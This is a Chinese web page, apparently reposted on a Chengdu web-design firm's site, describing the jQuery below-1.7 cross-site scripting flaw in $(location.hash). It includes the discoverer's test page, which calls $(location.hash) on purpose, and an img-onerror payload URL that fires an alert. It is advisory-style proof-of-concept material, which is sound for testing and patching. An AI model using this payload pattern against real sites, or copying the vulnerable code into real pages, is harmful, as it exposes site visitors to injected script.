jquery下載地址：https://code.jquery.com/jquery/

專注于為中小企業(yè)提供成都網(wǎng)站設(shè)計、做網(wǎng)站服務,電腦端+手機端+微信端的三站合一,更高效的管理,為中小企業(yè)英吉沙免費做網(wǎng)站提供優(yōu)質(zhì)的服務。我們立足成都，凝聚了一批互聯(lián)網(wǎng)行業(yè)人才，有力地推動了數(shù)千家企業(yè)的穩(wěn)健成長，幫助中小企業(yè)通過網(wǎng)站建設(shè)實現(xiàn)規(guī)模擴充和轉(zhuǎn)變。

影響范圍：

    版本低于1.7的jQuery過濾用戶輸入數(shù)據(jù)所使用的正則表達式存在缺陷，可能導致LOCATION.HASH跨站漏洞

已測試成功版本：

    jquery-1.6.min.js，jquery-1.6.1.min.js，jquery-1.6.2.min.js

    jquery-1.5所有版本

    jquery-1.4所有版本

    jquery-1.3所有版本

    jquery-1.2所有版本

測試：

啟動nginx，并建立index.html頁面，內(nèi)容如下：

漏洞發(fā)現(xiàn)者給的測試代碼：

<html>

<head>

    <title>JQuery-xss-test</title>

    <script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>

    <script>

    $(function(){

    try { $(location.hash) } catch(e) {}

    })

    </script>

</head>

<body>

    Jquery xss test.

</body>

</html>

訪問地址：

http://localhost/#<img src=/ onerror=alert(/F4ckTeam/)>

測試截圖：

網(wǎng)站名稱：jQuery跨站腳本漏洞XSSwith$(location.hash)漏洞
網(wǎng)站網(wǎng)址：http://www.aaarwkj.com/article20/psojco.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供電子商務、網(wǎng)站導航、響應式網(wǎng)站、網(wǎng)站營銷、網(wǎng)站制作、搜索引擎優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)